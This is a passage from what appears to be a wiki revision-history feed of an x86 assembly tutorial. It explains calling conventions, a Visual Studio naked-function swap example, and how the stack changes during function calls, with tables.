A ''__fastcall'' with no parameters is identical to ''__cdecl'' and ''__stdcall'' with no parameters, and a ''__fastcall'' with a single parameter looks like ''__thiscall''. <br />
<br />
Here are some __fastcall examples:<br />
<pre><br />
mov ecx, 7<br />
call func<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
<pre><br />
mov ecx, 7<br />
mov edx, 8<br />
call func<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
<pre><br />
mov ecx, 7<br />
mov edx, 8<br />
push param4<br />
push param3<br />
call func<br />
...<br />
func:<br />
...<br />
ret 8 ; Note that the function cleans itself up. <br />
</pre><br />
<br />
<br />
== __thiscall ==<br />
Seen only in object-oriented programming, ''__thiscall'' is very similar to ''__stdcall'', except that a pointer to the class whose member is being called is passed in ecx. <br />
* ecx is assigned a pointer to the class whose member is being called<br />
* The parameters are placed on the stack, the same as ''__stdcall'<br />
* The function cleans itself up, the same as ''__stdcall''<br />
<br />
Here is an example of __thiscall:<br />
<pre><br />
push param3<br />
push param2<br />
push param1<br />
mov ecx, this<br />
call func<br />
...<br />
func:<br />
...<br />
ret 12<br />
</pre><br />
<br />
== __declspec(naked) ==<br />
''__declspec(naked)'', a Visual Studio-specific convention, can't really be identified in assembly, since it's identical to __cdecl once it reaches assembly. However, the special property of this convention is that the compiler will generate no code in a function. This allows the program, in a __asm{} block, to write everything from preserving registers to allocating local variables and returning. This is useful when patching a jump in the middle of code, since it prevents the function from changing registers without the programmer's knowledge. <br />
<br />
This C function:<br />
void __declspec(naked) test()<br />
{<br />
}<br />
<br />
Would translate to this in assembly:<br />
<pre></pre><br />
<br />
Since no code is generated. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Functions&diff=3145Functions2012-01-16T02:10:02Z<p>Killboy: /* __stdcall */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
The previous section about the stack has shown how to call a standard function with parameters. This section will go over some other "calling conventions" besides the standard. <br />
<br />
A "calling convention" is the way in which a function is called. The standard convention, ''__cdecl'', is what has been used up until now. Some other common ones are ''__stdcall'', ''__fastcall'', and ''__thiscall''. <br />
<br />
A less common declaration used when writing hacks is ''__declspec(naked)''. <br />
<br />
== __cdecl ==<br />
''__cdecl'' is the default calling convention on most C compilers. The properties are as follows:<br />
* The caller places all the parameters on the stack<br />
* The caller removes the parameters from the stack (often by adding the total size added to the stack pointer)<br />
<br />
Throughout previous sections, ''__cdecl'' has been the calling convention used. However, here is an example to help illustrate it:<br />
<pre><br />
push param3<br />
push param2<br />
push param1 ; Parameters are pushed onto the stack<br />
call func ; The function is called<br />
add esp, 0Ch ; Parameters are removed from the stack<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
== __stdcall ==<br />
''__stdcall'' is another common calling convention. The properties of ''__stdcall'' are:<br />
* The caller places parameters on the stack<br />
* The called function removes the parameters from the stack, often by using the return instruction with a parameter equal to the number of parameters, "ret xx"<br />
<br />
Here's an example of a ''__stdcall'' function (note that if no parameters are passed, ''__stdcall'' is indistinguishable from ''__cdecl''. <br />
<br />
<pre><br />
push param3<br />
push param2<br />
push param1 ; Parameters are pushed onto the stack<br />
call func ; The function is called<br />
... <br />
func:<br />
...<br />
ret 0c; ; The function cleans up its own stack<br />
</pre><br />
<br />
The most useful part about ''__stdcall'' is that it tells a reverse engineer how many parameters are passed to any given function. In cases where no examples of the function being called may be found (possibly because it's an exported .dll function), it is easier to check the return than to enumerate local variables (of course, IDA looks after that automatically if that's an option).<br />
<br />
== __fastcall ==<br />
''__fastcall'' is the final common calling convention seen. All implementations of ''__fastcall'' pass parameters in registers, although Microsoft and Borland, for example, use different registers. Here are the properties of Microsoft's ''__fastcall'' implementation:<br />
* First two parameters are passed in ecx and edx, respectively<br />
* Third parameter and on are passed on the stack, as usual<br />
* Functions clean up their own stack, if necessary<br />
<br />
Recognizing a ''__fastcall'' function is easy: look for ecx and edx being used without being initialized in a function. <br />
<br />
A ''__fastcall'' with no parameters is identical to ''__cdecl'' and ''__stdcall'' with no parameters, and a ''__fastcall'' with a single parameter looks like ''__thiscall''. <br />
<br />
Here are some __fastcall examples:<br />
<pre><br />
mov ecx, 7<br />
call func<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
<pre><br />
mov ecx, 7<br />
mov edx, 8<br />
call func<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
<pre><br />
mov ecx, 7<br />
mov edx, 8<br />
push param4<br />
push param3<br />
call func<br />
...<br />
func:<br />
...<br />
ret 8 ; Note that the function cleans itself up. <br />
</pre><br />
<br />
<br />
== __thiscall ==<br />
Seen only in object-oriented programming, ''__thiscall'' is very similar to ''__stdcall'', except that a pointer to the class whose member is being called is passed in ecx. <br />
* ecx is assigned a pointer to the class whose member is being called<br />
* The parameters are placed on the stack, the same as ''__stdcall'<br />
* The function cleans itself up, the same as ''__stdcall''<br />
<br />
Here is an example of __thiscall:<br />
<pre><br />
push param3<br />
push param2<br />
push param1<br />
mov ecx, this<br />
call func<br />
...<br />
func:<br />
...<br />
ret 12<br />
</pre><br />
<br />
== __declspec(naked) ==<br />
''__declspec(naked)'', a Visual Studio-specific convention, can't really be identified in assembly, since it's identical to __cdecl once it reaches assembly. However, the special property of this convention is that the compiler will generate no code in a function. This allows the program, in a __asm{} block, to write everything from preserving registers to allocating local variables and returning. This is useful when patching a jump in the middle of code, since it prevents the function from changing registers without the programmer's knowledge. <br />
<br />
This C function:<br />
void __declspec(naked) test()<br />
{<br />
}<br />
<br />
Would translate to this in assembly:<br />
<pre></pre><br />
<br />
Since no code is generated. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Functions&diff=3144Functions2012-01-16T02:09:32Z<p>Killboy: /* __stdcall */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
The previous section about the stack has shown how to call a standard function with parameters. This section will go over some other "calling conventions" besides the standard. <br />
<br />
A "calling convention" is the way in which a function is called. The standard convention, ''__cdecl'', is what has been used up until now. Some other common ones are ''__stdcall'', ''__fastcall'', and ''__thiscall''. <br />
<br />
A less common declaration used when writing hacks is ''__declspec(naked)''. <br />
<br />
== __cdecl ==<br />
''__cdecl'' is the default calling convention on most C compilers. The properties are as follows:<br />
* The caller places all the parameters on the stack<br />
* The caller removes the parameters from the stack (often by adding the total size added to the stack pointer)<br />
<br />
Throughout previous sections, ''__cdecl'' has been the calling convention used. However, here is an example to help illustrate it:<br />
<pre><br />
push param3<br />
push param2<br />
push param1 ; Parameters are pushed onto the stack<br />
call func ; The function is called<br />
add esp, 0Ch ; Parameters are removed from the stack<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
== __stdcall ==<br />
''__stdcall'' is another common calling convention. The properties of ''__stdcall'' are:<br />
* The caller places parameters on the stack<br />
* The called function removes the parameters from the stack, often by using the return instruction with a parameter equal to the number of parameters, "ret xx"<br />
<br />
Here are a couple examples of ''__stdcall'' functions (note that if no parameters are passed, ''__stdcall'' is indistinguishable from ''__cdecl''. <br />
<br />
<pre><br />
push param3<br />
push param2<br />
push param1 ; Parameters are pushed onto the stack<br />
call func ; The function is called<br />
... <br />
func:<br />
...<br />
ret 0c; ; The function cleans up its own stack<br />
</pre><br />
<br />
The most useful part about ''__stdcall'' is that it tells a reverse engineer how many parameters are passed to any given function. In cases where no examples of the function being called may be found (possibly because it's an exported .dll function), it is easier to check the return than to enumerate local variables (of course, IDA looks after that automatically if that's an option).<br />
<br />
== __fastcall ==<br />
''__fastcall'' is the final common calling convention seen. All implementations of ''__fastcall'' pass parameters in registers, although Microsoft and Borland, for example, use different registers. Here are the properties of Microsoft's ''__fastcall'' implementation:<br />
* First two parameters are passed in ecx and edx, respectively<br />
* Third parameter and on are passed on the stack, as usual<br />
* Functions clean up their own stack, if necessary<br />
<br />
Recognizing a ''__fastcall'' function is easy: look for ecx and edx being used without being initialized in a function. <br />
<br />
A ''__fastcall'' with no parameters is identical to ''__cdecl'' and ''__stdcall'' with no parameters, and a ''__fastcall'' with a single parameter looks like ''__thiscall''. <br />
<br />
Here are some __fastcall examples:<br />
<pre><br />
mov ecx, 7<br />
call func<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
<pre><br />
mov ecx, 7<br />
mov edx, 8<br />
call func<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
<pre><br />
mov ecx, 7<br />
mov edx, 8<br />
push param4<br />
push param3<br />
call func<br />
...<br />
func:<br />
...<br />
ret 8 ; Note that the function cleans itself up. <br />
</pre><br />
<br />
<br />
== __thiscall ==<br />
Seen only in object-oriented programming, ''__thiscall'' is very similar to ''__stdcall'', except that a pointer to the class whose member is being called is passed in ecx. <br />
* ecx is assigned a pointer to the class whose member is being called<br />
* The parameters are placed on the stack, the same as ''__stdcall'<br />
* The function cleans itself up, the same as ''__stdcall''<br />
<br />
Here is an example of __thiscall:<br />
<pre><br />
push param3<br />
push param2<br />
push param1<br />
mov ecx, this<br />
call func<br />
...<br />
func:<br />
...<br />
ret 12<br />
</pre><br />
<br />
== __declspec(naked) ==<br />
''__declspec(naked)'', a Visual Studio-specific convention, can't really be identified in assembly, since it's identical to __cdecl once it reaches assembly. However, the special property of this convention is that the compiler will generate no code in a function. This allows the program, in a __asm{} block, to write everything from preserving registers to allocating local variables and returning. This is useful when patching a jump in the middle of code, since it prevents the function from changing registers without the programmer's knowledge. <br />
<br />
This C function:<br />
void __declspec(naked) test()<br />
{<br />
}<br />
<br />
Would translate to this in assembly:<br />
<pre></pre><br />
<br />
Since no code is generated. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Stack_Example&diff=3143Stack Example2012-01-16T01:50:49Z<p>Killboy: </p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
This code should compile and run in Visual Studio (I've tested it):<br />
<br />
<pre><br />
#include <stdio.h><br />
<br />
void __declspec(naked) swap(int *a, int *b)<br />
{<br />
__asm<br />
{<br />
push ebp ; Preserve ebp.<br />
mov ebp, esp ; Set up the frame pointer.<br />
sub esp, 8 ; Make room for two local variables.<br />
push esi ; Preserve esi on the stack.<br />
push edi ; Preserve edi on the stack.<br />
<br />
mov ecx, [ebp+8] ; Put the first parameter (a pointer) into ecx.<br />
mov edx, [ebp+12] ; Put the second parameter (a pointer) into edx.<br />
<br />
mov esi, [ecx] ; Dereference the pointer to get the first parameter.<br />
mov edi, [edx] ; Dereference the pointer to get the second parameter.<br />
<br />
mov [ebp-4], esi ; Store the first as a local variable<br />
mov [ebp-8], edi ; Store the second as a local variable<br />
<br />
mov esi, [ebp-8] ; Retrieve them in reverse<br />
mov edi, [ebp-4]<br />
<br />
mov [ecx], esi ; Put the second value into the first address.<br />
mov [edx], edi ; Put the first value into the second address.<br />
<br />
pop edi ; Restore the edi register<br />
pop esi ; Restore the esi register<br />
add esp, 8 ; Remove the local variables from the stack<br />
pop ebp ; Restore ebp<br />
ret ; Return (eax isn't set, so there's no return value)<br />
}<br />
}<br />
<br />
int main(int argc, char* argv[])<br />
{<br />
int a = 3; <br />
int b = 4;<br />
<br />
printf("a = %d, b = %d\n", a, b);<br />
swap(&a, &b);<br />
printf("a = %d, b = %d\n", a, b);<br />
<br />
while(1)<br />
;<br />
<br />
return 0;<br />
}<br />
</pre></div>Killboyhttps://wiki.skullsecurity.org/index.php?title=The_Stack&diff=3142The Stack2012-01-16T01:07:57Z<p>Killboy: /* Frame Pointer */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
The stack is, at best, a difficult concept to understand. However, understanding the stack is essential to reverse engineering code. <br />
<br />
The stack register, esp, is basically a register that points to an arbitrary location in memory called "the stack". The stack is just a really big section of memory where temporary data can be stored and retrieved. When a function is called, some stack space is allocated to the function, and when a function returns the stack should be in the same state it started in. <br />
<br />
The stack always grows downwards, towards lower values. The esp register always points to the lowest value on the stack. Anything below esp is considered free memory that can be overwritten. <br />
<br />
The stack stores function parameters, local variables, and the return address of every function. <br />
<br />
== Function Parameters ==<br />
When a function is called, its parameters are typically stored on the stack before making the call. Here is an example of a function call in C:<br />
func(1, 2, 3); <br />
And here is the equivalent call in assembly:<br />
push 3<br />
push 2<br />
push 1<br />
call func<br />
add esp, 0Ch<br />
<br />
The parameters are put on the stack, then the function is called. The function has to know it's getting 3 parameters, which is why function parameters have to be declared in C. <br />
<br />
After the function returns, the stack pointer is still 12 bytes ahead of where it started. In order to restore the stack to where it used to be, 12 (0x0c) has to be added to the stack pointer. The three pushes, of 4 bytes each, mean that a total of 12 was subtracted from the stack. <br />
<br />
Here is what the initial stack looked like (with ?'s representing unknown stack values):<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
Note that the same 5 32-bit stack values are shown in all these examples, with the stack pointer at the left moved. The stack goes much further up and down, but that isn't shown here. <br />
<br />
Here are the three pushes:<br />
<br />
<br />
<br />
push 3<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 4</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
push 2<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 8</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
push 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Now all three values are on the stack, and esp is pointing at the 1. The function is called, and returns, leaving the stack the way it started. Now the final instruction runs:<br />
<br />
<br />
<br />
add esp, 0Ch<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Note that the 3, 2, and 1 are still on the stack. However, they're below the stack pointer, which means that they are considered free memory and will be overwritten.<br />
<br />
== call and ret Revisited ==<br />
<br />
The ''call'' instruction pushes the address of the next instruction onto the stack, then jumps to the specified function. <br />
<br />
The ''ret'' instruction pops the next value off the stack, which should have been put there by a call, and jumps to it. <br />
<br />
Here is some example code:<br />
0x10000000 push 3<br />
0x10000001 push 2<br />
0x10000002 push 1<br />
0x10000003 call 0x10000020<br />
0x10000007 add esp, 12<br />
0x10000011 exit ; This isn't a real instruction, but pretend it is<br />
0x10000020 mov eax, 1<br />
0x10000024 ret<br />
<br />
Now here is what the stack looks like at each step in this code:<br />
<br />
<br />
<br />
0x10000000 push 3<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 4</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000001 push 2<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 8</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000002 push 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000003 call 0x10000020<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 16</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>0x1000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000020 mov eax, 1<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 16</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>0x1000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000024 ret<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>esp + 12</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>'''''esp'''''</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>0x1000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000007 add esp, 12<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>0x1000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x10000011 exit ; This isn't a real instruction, but pretend it is<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='75'>'''''esp'''''</td><br />
<td align='center' width='50'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>3</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>0x1000007</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
Note the return address being pushed onto the stack by call, and being popped off the stack by ret.<br />
<br />
== Saved Registers ==<br />
Some registers (ebx, edi, esi, ebp) are generally considered to be non-volatile. What that means is that when a function is called, those registers have to be saved. Typically, this is done by pushing them onto the stack at the start of a function, and popping them in reverse order at the end. Here is a simple example:<br />
<br />
; function test()<br />
push esi<br />
push edi<br />
.....<br />
pop edi<br />
pop esi<br />
ret<br />
<br />
== Local Variables ==<br />
<br />
At the beginning of most functions, space to store local variables in is allocated. This is done by subtracting the total size of all local variables from the stack pointer at the start of the function, then referencing them based on the stack. An example of this will be demonstrated in the following section. <br />
<br />
== Frame Pointer ==<br />
The frame pointer is the final piece to the puzzle. Unless a program has been optimized, ebp is set to point at the beginning of the local variables. The reason for this is that throughout a function, the stack changes (due to saving variables, making function calls, and others reasons), so keeping track of where the local variables are relative to the stack pointer is tricky. The frame pointer, on the other hand, is stored in a non-volatile register, ebp, so it never changed during the function. <br />
<br />
Here is an example of a swap function that uses two parameters passed on the stack and a local variable to store the interim result (if you don't fully understand this, don't worry too much -- I don't either. IDA tends to look after this kind of stuff for you automatically, so this is more theory than actual useful information. Please note that the virtual memory addresses have been modified for simplicity, in reality the addresses would increase based on the size of the previous operation):<br />
<br />
<pre><br />
0x400000 push ecx ; A pointer to an integer in memory - second parameter (param2)<br />
0x400001 push edx ; Another integer pointer - first parameter (param1)<br />
0x400002 call 0x401000 ; Call the swap function<br />
0x400003 add esp, 8 ; Balance the stack<br />
.....<br />
0x401000 ; function swap(int *a, int *b)<br />
0x401000 push ebp ; Preserve ebp.<br />
0x401001 mov ebp, esp ; Set up the frame pointer.<br />
0x401002 sub esp, 8 ; Make room for two local variables.<br />
0x401003 push esi ; Preserve esi on the stack.<br />
0x401004 push edi ; Preserve edi on the stack.<br />
<br />
0x401005 mov ecx, [ebp+8] ; Put param1 (a pointer) into ecx.<br />
0x401006 mov edx, [ebp+12] ; Put param2 (a pointer) into edx.<br />
<br />
0x401007 mov esi, [ecx] ; Dereference param1 to get the first value.<br />
0x401008 mov edi, [edx] ; Dereference param2 to get the second value.<br />
<br />
0x401009 mov [ebp-4], esi ; Store the first value as a local variable<br />
0x40100a mov [ebp-8], edi ; Store the second value as a local variable<br />
<br />
0x40100b mov esi, [ebp-8] ; Retrieve them in reverse<br />
0x40100c mov edi, [ebp-4]<br />
<br />
0x40100d mov [ecx], edi ; Put the first value into the second address (param2 = param1)<br />
0x40100e mov [edx], esi ; Put the second value into the first address (param1 = param2)<br />
<br />
0x40100f pop edi ; Restore the edi register<br />
0x401010 pop esi ; Restore the esi register<br />
0x401011 add esp, 8 ; Remove the local variables from the stack<br />
0x401012 pop ebp ; Restore ebp<br />
0x401013 ret ; Return (eax isn't set, so there's no return value)<br />
</pre><br />
<br />
(You can download the complete code to test this example in Visual Studio [[Stack_Example|here]].)<br />
<br />
<br />
<br />
Because this is such a complicated example, it's valuable to go through it step by step, keeping track of the stack (again, if you use IDA, the stack variables will automatically be identified, but you should still understand how this works):<br />
<br />
Initial stack:<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp - 4</td><br />
<td align='center' width='100'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 32</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 36</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x400000 push ecx ; A pointer to an integer in memory<br />
0x400001 push edx ; Another integer pointer<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 4</td><br />
<td align='center' width='100' style='color: red;'>param2</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x400002 call 0x401000 ; Call the swap function<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 8</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401000 ; function swap(int *a, int *b)<br />
0x401000 push ebp ; Preserve ebp.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 12</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>(ebp's value)</td><br />
</tr><br />
<tr><br />
